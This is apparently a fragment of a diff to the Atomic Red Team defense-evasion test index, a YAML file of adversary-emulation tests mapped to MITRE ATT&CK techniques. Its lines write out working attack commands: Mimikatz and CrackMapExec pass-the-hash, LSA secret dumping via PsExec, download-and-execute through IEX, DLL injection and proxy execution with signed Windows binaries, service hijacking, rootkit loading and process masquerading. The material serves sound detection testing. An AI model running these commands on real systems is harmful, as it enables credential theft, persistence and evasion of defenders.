(#{dll_path}) - ' +' prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}" @@ -30345,7 +30345,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}'' -ParentId #{parent_pid}' @@ -30374,7 +30374,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid #{test_guid}' 
@@ -30404,7 +30404,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine, ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" | @@ -30440,7 +30440,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine ''#{command_line}''' @@ -30525,7 +30525,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -30539,13 +30539,13 @@ defense-evasion: command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}" - ' +' name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec - ' +' supported_platforms: - windows input_arguments: @@ -30574,18 +30574,18 @@ defense-evasion: - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe}) - ' +' prereq_command: 'if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 } - ' +' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe} - ' +' executor: command: 'crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command} - ' +' name: command_prompt T1550.003: technique: @@ -30664,7 +30664,7 @@ defense-evasion: auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos - ' +' supported_platforms: - windows input_arguments: 
@@ -30684,10 +30684,10 @@ defense-evasion: dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe}) - ' +' prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip" @@ -30765,7 +30765,7 @@ defense-evasion: description: 'Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges. - ' +' supported_platforms: - windows input_arguments: @@ -30778,14 +30778,14 @@ defense-evasion: - description: 'AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll}) - ' +' prereq_command: 'if (Test-Path #{input_dll}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host "You must provide your own password filter dll" - ' +' executor: command: | $passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename @@ -31616,13 +31616,13 @@ defense-evasion: cleanup_command: 'Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore - ' +' name: powershell - name: RunPE via VBA auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b description: 'This module executes notepad.exe from within the WINWORD.EXE process - ' +' supported_platforms: - windows input_arguments: @@ -31634,7 +31634,7 @@ defense-evasion: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null 
@@ -31645,7 +31645,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -31768,7 +31768,7 @@ defense-evasion: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed - ' +' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -31779,7 +31779,7 @@ defense-evasion: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -31814,7 +31814,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -31828,10 +31828,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" @@ -31842,7 +31842,7 @@ defense-evasion: command: '#{psexec_path} /accepteula \\#{machine} -c #{mimikatz_path} "lsadump::lsa /inject /id:500" "exit" - ' +' name: command_prompt elevation_required: false T1055.008: @@ -31977,7 +31977,7 @@ defense-evasion: description: 'Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload. - ' +' supported_platforms: - windows input_arguments: 
@@ -31989,7 +31989,7 @@ defense-evasion: command: 'cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" - ' +' name: command_prompt T1542.004: technique: @@ -32212,7 +32212,7 @@ defense-evasion: description: 'Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn''t really execute either." will be displayed. - ' +' supported_platforms: - windows input_arguments: @@ -32229,10 +32229,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) - ' +' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -32242,7 +32242,7 @@ defense-evasion: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file} cleanup_command: 'del #{output_file} >nul 2>&1 - ' +' name: command_prompt - name: Regsvcs Uninstall Method Call Test auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126 @@ -32265,10 +32265,10 @@ defense-evasion: - description: 'The CSharp source file must exist on disk at specified location (#{source_file}) - ' +' prereq_command: 'if (Test-Path #{source_file}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{source_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.009/src/T1218.009.cs" -OutFile "#{source_file}" @@ -32357,7 +32357,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: 
@@ -32377,10 +32377,10 @@ defense-evasion: dependencies: - description: 'Regsvr32.sct must exist on disk at specified location (#(unknown)) - ' +' prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/src/RegSvr32.sct" -OutFile "#(unknown)" @@ -32415,7 +32415,7 @@ defense-evasion: description: 'Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. - ' +' supported_platforms: - windows input_arguments: @@ -32436,10 +32436,10 @@ defense-evasion: - description: 'AllTheThingsx86.dll must exist on disk at specified location (#{dll_name}) - ' +' prereq_command: 'if (Test-Path #{dll_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.010/bin/AllTheThingsx86.dll" -OutFile "#{dll_name}" @@ -32447,14 +32447,14 @@ defense-evasion: command: 'IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( #{regsvr32path}\#{regsvr32name} /s #{dll_name} ) - ' +' name: command_prompt - name: Regsvr32 Registering Non DLL auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 description: 'Replicating observed Gozi maldoc behavior registering a dll with an altered extension - ' +' supported_platforms: - windows input_arguments: @@ -32474,13 +32474,13 @@ defense-evasion: dependencies: - description: 'Test requires a renamed dll file - ' +' prereq_command: 'if exist #{dll_file} ( exit 0 ) else ( exit 1 ) - ' +' get_prereq_command: 'copy "C:\Windows\System32\shell32.dll" "#{dll_file}" - ' +' executor: name: command_prompt elevation_required: false 
@@ -32596,7 +32596,7 @@ defense-evasion: %SystemRoot%\Temp\lsass.exe /B cleanup_command: 'del /Q /F %SystemRoot%\Temp\lsass.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading as Linux crond process. auto_generated_guid: a315bfff-7a98-403b-b442-2ea1b255e556 @@ -32612,7 +32612,7 @@ defense-evasion: /tmp/crond cleanup_command: 'rm /tmp/crond - ' +' name: sh - name: Masquerading - cscript.exe running as notepad.exe auto_generated_guid: 3a2a578b-0a01-46e4-92e3-62e2859b42f0 @@ -32628,7 +32628,7 @@ defense-evasion: cmd.exe /c %APPDATA%\notepad.exe /B cleanup_command: 'del /Q /F %APPDATA%\notepad.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading - wscript.exe running as svchost.exe auto_generated_guid: 24136435-c91a-4ede-9da1-8b284a1c1a23 @@ -32644,7 +32644,7 @@ defense-evasion: cmd.exe /c %APPDATA%\svchost.exe /B cleanup_command: 'del /Q /F %APPDATA%\svchost.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading - powershell.exe running as taskhostw.exe auto_generated_guid: ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa @@ -32660,7 +32660,7 @@ defense-evasion: cmd.exe /K %APPDATA%\taskhostw.exe cleanup_command: 'del /Q /F %APPDATA%\taskhostw.exe >nul 2>&1 - ' +' name: command_prompt - name: Masquerading - non-windows exe running as windows exe auto_generated_guid: bc15c13f-d121-4b1f-8c7d-28d95854d086 @@ -32683,10 +32683,10 @@ defense-evasion: dependencies: - description: 'Exe file to copy must exist on disk at specified location (#{inputfile}) - ' +' prereq_command: 'if (Test-Path #{inputfile}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inputfile}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036.003/bin/T1036.003.exe" -OutFile "#{inputfile}" 
@@ -32697,14 +32697,14 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore - ' +' name: powershell - name: Masquerading - windows exe running as different windows exe auto_generated_guid: c3d24a39-2bfe-4c6a-b064-90cd73896cb0 description: 'Copies a windows exe, renames it as another windows exe, and launches it to masquerade as second windows exe - ' +' supported_platforms: - windows input_arguments: @@ -32723,7 +32723,7 @@ defense-evasion: Stop-Process -ID $myT1036_003 cleanup_command: 'Remove-Item #{outputfile} -Force -ErrorAction Ignore - ' +' name: powershell - name: Malicious process Masquerading as LSM.exe auto_generated_guid: 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f @@ -33005,7 +33005,7 @@ defense-evasion: - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path}) - ' +' prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1} @@ -33018,10 +33018,10 @@ defense-evasion: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path}) - ' +' prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -33130,7 +33130,7 @@ defense-evasion: auto_generated_guid: dfb50072-e45a-4c75-a17e-a484809c8553 description: 'Loadable Kernel Module based Rootkit - ' +' supported_platforms: - linux input_arguments: 
@@ -33155,10 +33155,10 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) - ' +' prereq_command: 'if [ -f #{rootkit_path} ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi; cp #{rootkit_source_path}/* #{temp_folder}/ @@ -33168,17 +33168,17 @@ defense-evasion: executor: command: 'sudo insmod #{rootkit_path} - ' +' cleanup_command: 'sudo rmmod #{rootkit_name} - ' +' name: sh elevation_required: true - name: Loadable Kernel Module based Rootkit auto_generated_guid: 75483ef8-f10f-444a-bf02-62eb0e48db6f description: 'Loadable Kernel Module based Rootkit - ' +' supported_platforms: - linux input_arguments: @@ -33203,11 +33203,11 @@ defense-evasion: dependencies: - description: 'The kernel module must exist on disk at specified location (#{rootkit_path}) - ' +' prereq_command: 'if [ -f /lib/modules/$(uname -r)/#{rootkit_name}.ko ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: "if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;\ncp #{rootkit_source_path}/* #{temp_folder}/\ncd #{temp_folder}; make \nsudo cp #{temp_folder}/#{rootkit_name}.ko @@ -33216,7 +33216,7 @@ defense-evasion: executor: command: 'sudo modprobe #{rootkit_name} - ' +' cleanup_command: | sudo modprobe -r #{rootkit_name} sudo rm /lib/modules/$(uname -r)/#{rootkit_name}.ko @@ -33247,15 +33247,15 @@ defense-evasion: dependencies: - description: 'puppetstrings.exe must exist on disk at specified location (#{puppetstrings_path}) - ' +' prereq_command: 'if (Test-Path #{puppetstrings_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1014/bin/puppetstrings.exe" -OutFile "#{puppetstrings_path}" - ' +' executor: name: command_prompt command: "#{puppetstrings_path} #{driver_path}\n" 
@@ -33383,7 +33383,7 @@ defense-evasion: description: 'Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. - ' +' supported_platforms: - windows input_arguments: @@ -33394,7 +33394,7 @@ defense-evasion: executor: command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); - ' +' name: command_prompt - name: Rundll32 execute VBscript command auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb @@ -33412,7 +33412,7 @@ defense-evasion: executor: command: 'rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0) - ' +' name: command_prompt - name: Rundll32 advpack.dll Execution auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89 @@ -33431,17 +33431,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, - ' +' name: command_prompt - name: Rundll32 ieadvpack.dll Execution auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9 
@@ -33461,17 +33461,17 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011.inf" -OutFile "#{inf_to_execute}" executor: command: 'rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, - ' +' name: command_prompt - name: Rundll32 syssetup.dll Execution auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125 @@ -33490,10 +33490,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" @@ -33501,7 +33501,7 @@ defense-evasion: command: 'rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute} - ' +' name: command_prompt - name: Rundll32 setupapi.dll Execution auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19 @@ -33520,10 +33520,10 @@ defense-evasion: dependencies: - description: 'Inf file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/src/T1218.011_DefaultInstall.inf" -OutFile "#{inf_to_execute}" 
@@ -33531,7 +33531,7 @@ defense-evasion: command: 'rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute} - ' +' name: command_prompt - name: Execution of HTA and VBS Files using Rundll32 and URL.dll auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3 @@ -33554,7 +33554,7 @@ defense-evasion: description: 'Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. - ' +' supported_platforms: - windows input_arguments: @@ -33565,7 +33565,7 @@ defense-evasion: executor: command: 'rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch} - ' +' name: command_prompt T1134.005: technique: @@ -33964,7 +33964,7 @@ defense-evasion: description: 'Change Service registry ImagePath of a bengin service to a malicious file - ' +' supported_platforms: - windows input_arguments: @@ -33984,22 +33984,22 @@ defense-evasion: dependencies: - description: 'The service must exist (#{weak_service_name}) - ' +' prereq_command: 'if (Get-Service #{weak_service_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'sc.exe create #{weak_service_name} binpath= "#{weak_service_path}" - ' +' executor: command: 'reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /f /v ImagePath /d "#{malicious_service_path}" - ' +' cleanup_command: 'sc.exe delete #{weak_service_name} - ' +' name: command_prompt T1548.001: technique: @@ -34055,7 +34055,7 @@ defense-evasion: description: 'Make, change owner, and change file attributes on a C source code file - ' +' supported_platforms: - macos - linux @@ -34081,7 +34081,7 @@ defense-evasion: auto_generated_guid: 759055b3-3885-4582-a8ec-c00c9d64dd79 description: 'This test sets the SetUID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux 
@@ -34097,14 +34097,14 @@ defense-evasion: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true - name: Set a SetGID flag on file auto_generated_guid: db55f666-7cba-46c6-9fe6-205a05c3242c description: 'This test sets the SetGID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -34120,7 +34120,7 @@ defense-evasion: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' name: sh elevation_required: true T1218: @@ -34179,7 +34179,7 @@ defense-evasion: description: 'Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. - ' +' supported_platforms: - windows input_arguments: @@ -34195,17 +34195,17 @@ defense-evasion: dependencies: - description: 'T1218.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll" -OutFile "#{dll_payload}" executor: command: 'mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload} - ' +' name: command_prompt elevation_required: true - name: SyncAppvPublishingServer - Execute arbitrary PowerShell code @@ -34213,7 +34213,7 @@ defense-evasion: description: 'Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. - ' +' supported_platforms: - windows input_arguments: 
@@ -34224,14 +34224,14 @@ defense-evasion: executor: command: 'SyncAppvPublishingServer.exe "n; #{powershell_code}" - ' +' name: command_prompt - name: Register-CimProvider - Execute evil dll auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655 description: 'Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB - ' +' supported_platforms: - windows input_arguments: @@ -34243,17 +34243,17 @@ defense-evasion: dependencies: - description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload}) - ' +' prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}" executor: command: 'C:\Windows\SysWow64\Register-CimProvider.exe -Path #{dll_payload} - ' +' name: command_prompt - name: InfDefaultInstall.exe .inf Execution auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef @@ -34272,17 +34272,17 @@ defense-evasion: dependencies: - description: 'INF file must exist on disk at specified location (#{inf_to_execute}) - ' +' prereq_command: 'if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf" -OutFile "#{inf_to_execute}" executor: command: 'InfDefaultInstall.exe #{inf_to_execute} - ' +' name: command_prompt - name: ProtocolHandler.exe Downloaded a Suspicious File auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2 @@ -34290,7 +34290,7 @@ defense-evasion: Office. On successful execution you should see Microsoft Word launch a blank file. - ' +' supported_platforms: - windows input_arguments: 
@@ -34303,15 +34303,15 @@ defense-evasion: - description: 'Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided - ' +' prereq_command: 'if (Test-Path "(Resolve-Path "C:\Program Files*\Microsoft Office\root\Office16")\protocolhandler.exe") {exit 0} else {exit 1} - ' +' get_prereq_command: 'write-host "Install Microsoft Word or provide correct path." - ' +' executor: name: command_prompt elevation_required: false @@ -34323,7 +34323,7 @@ defense-evasion: description: 'Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe - ' +' supported_platforms: - windows input_arguments: @@ -34345,15 +34345,15 @@ defense-evasion: prereq_command: 'if (Test-Path #{mwcpath}\#{mwcname} ) {exit 0} else {exit 1} - ' +' get_prereq_command: 'write-host ".Net must be installed for this test to work correctly." - ' +' executor: command: '#{mwcpath}\#{mwcname} "#{xml_payload}" output.txt - ' +' name: powershell elevation_required: false - name: Renamed Microsoft.Workflow.Compiler.exe Payload Executions @@ -34361,7 +34361,7 @@ defense-evasion: description: 'Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe - ' +' supported_platforms: - windows input_arguments: @@ -34390,7 +34390,7 @@ defense-evasion: get_prereq_command: 'write-host "you need to rename workflow complier before you run this test" - ' +' executor: command: "#{renamed_binary} #{xml_payload} output.txt\n" name: powershell @@ -34433,7 +34433,7 @@ defense-evasion: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}' 
@@ -34500,14 +34500,14 @@ defense-evasion: executor: command: 'C:\windows\system32\SyncAppvPublishingServer.vbs "\n;#{command_to_execute}" - ' +' name: command_prompt - name: manage-bde.wsf Signed Script Command Execution auto_generated_guid: 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a description: 'Executes the signed manage-bde.wsf script with options to execute an arbitrary command. - ' +' supported_platforms: - windows input_arguments: @@ -34521,7 +34521,7 @@ defense-evasion: cscript %windir%\System32\manage-bde.wsf cleanup_command: 'set comspec=%windir%\System32\cmd.exe - ' +' name: command_prompt T1027.002: technique: @@ -34597,10 +34597,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh - name: Binary packed by UPX, with modified headers (linux) auto_generated_guid: f06197f8-ff46-48c2-a0c6-afc1b50665e1 @@ -34619,10 +34619,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh - name: Binary simply packed by UPX auto_generated_guid: b16ef901-00bb-4dda-b4fc-a04db5067e20 @@ -34639,10 +34639,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh - name: Binary packed by UPX, with modified headers auto_generated_guid: 4d46e16b-5765-4046-9f25-a600d3e65e4d @@ -34661,10 +34661,10 @@ defense-evasion: executor: command: 'cp #{bin_path} /tmp/packed_bin && /tmp/packed_bin - ' +' cleanup_command: 'rm /tmp/packed_bin - ' +' name: sh T1036.006: technique: @@ -34718,7 +34718,7 @@ defense-evasion: auto_generated_guid: 89a7dd26-e510-4c9f-9b15-f3bae333360f description: 'Space After Filename - ' +' supported_platforms: - macos executor: 
@@ -34934,7 +34934,7 @@ defense-evasion: auto_generated_guid: 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e description: 'Common Sudo enumeration methods. - ' +' supported_platforms: - macos - linux @@ -34948,7 +34948,7 @@ defense-evasion: This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -34963,7 +34963,7 @@ defense-evasion: description: 'Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using ''visudo'', do not do this on a production system. - ' +' supported_platforms: - macos - linux @@ -35073,7 +35073,7 @@ defense-evasion: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; - ' +' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -35083,7 +35083,7 @@ defense-evasion: This is meant to find the result of Not supported, which is the result if run in a virtual machine - ' +' supported_platforms: - windows executor: @@ -35100,7 +35100,7 @@ defense-evasion: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. - ' +' supported_platforms: - macos executor: @@ -35110,7 +35110,7 @@ defense-evasion: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; - ' +' T1542.001: technique: id: attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada @@ -35350,7 +35350,7 @@ defense-evasion: executor: command: 'start #{docx_file} - ' +' name: command_prompt T1055.003: technique: @@ -35593,7 +35593,7 @@ defense-evasion: auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 description: 'Stomps on the access timestamp of a file - ' +' supported_platforms: - linux - macos 
